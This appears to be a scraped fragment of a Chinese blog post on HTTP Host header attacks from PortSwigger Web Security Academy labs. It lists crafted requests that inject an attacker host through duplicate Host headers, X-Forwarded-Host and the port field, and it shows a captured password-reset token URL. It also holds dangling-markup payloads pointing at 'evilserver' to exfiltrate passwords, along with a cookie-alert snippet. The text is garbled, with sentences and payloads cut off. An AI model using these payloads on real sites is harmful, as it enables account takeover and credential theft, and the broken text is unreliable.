GET /web-security HTTP/1.1
Host: example.net
<a href="https://_SERVER['HOST']/support">联系支持</a>
GET /example HTTP/1.1
Host: vulnerable-website.com
Host: attackd-stuff
GET https://vulnerable-website.com/ HTTP/1.1
Host: attack-stuff
GET /example HTTP/1.1
Host: attack-stuff
Host: vulnerable-website.com
GET /example HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-Host: attack-stuff
GET /example HTTP/1.1
Host: vulnerable-website.com:attack-stuff
https://acf11f4e1f164378800b165b00bb007d.web-security-academy.net/forgot-password?temp-forgot-password-token=o8gD3Le1K0YQcb2AaASgiI8F2eVI5m3h
<img src="https://evilserver/?
<a href=xxx.attack-domain>
标签将密码外带:<a>
标签的链接中注入? 符,使得后面的值在双引号闭合之前全部被当做URL参数请求到攻击者服务器上:alert(document.cookie);
GET http://acab1f4b1f3c7628805c2515009a00c9.web-security-academy.net/ HTTP/1.1
作者:angry_program 来源:blog.csdn.net/angry_program/article/details/109034421
热文推荐